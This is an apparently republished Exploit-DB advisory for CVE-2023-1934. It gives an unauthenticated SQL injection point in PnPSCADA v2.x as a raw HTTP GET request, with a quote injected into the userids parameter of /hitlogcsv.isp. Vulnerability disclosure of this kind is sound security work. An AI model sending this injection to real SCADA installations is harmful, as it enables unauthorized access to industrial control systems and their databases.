[webapps] PnPSCADA v2.x - Unauthenticated PostgreSQL Injection
2023-5-23 08:0:0 Author: www.exploit-db.com(查看原文) 阅读量:14 收藏
2023-5-23 08:0:0 Author: www.exploit-db.com(查看原文) 阅读量:14 收藏
# Exploit Title: PnPSCADA v2.x - Unauthenticated PostgreSQL Injection
# Date: 15/5/2023
# Exploit Author: Momen Eldawakhly (Cyber Guy) at Samurai Digital Security Ltd
# Vendor Homepage: https://pnpscada.com/
# Version: PnPSCADA (cross platforms): v2.x
# Tested on: Unix
# CVE : CVE-2023-1934
# Proof-of-Concept: https://drive.google.com/drive/u/0/folders/1r_HMoaU3P0t-04gMM90M0hfdBRi_P0_8
SQLi crashing point:
GET /hitlogcsv.isp?userids=1337'&startdate=
2022-12-138200083A0093A00&enddate=2022-12-138201383A1783A00
HTTP/1.1
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US)
AppleWebKit/534.14 (KHTML, like Gecko) Chrome/9.0.601.0
Safari/534.14
Host: vulnerablepnpscada.int
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
文章来源: https://www.exploit-db.com/exploits/51448
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh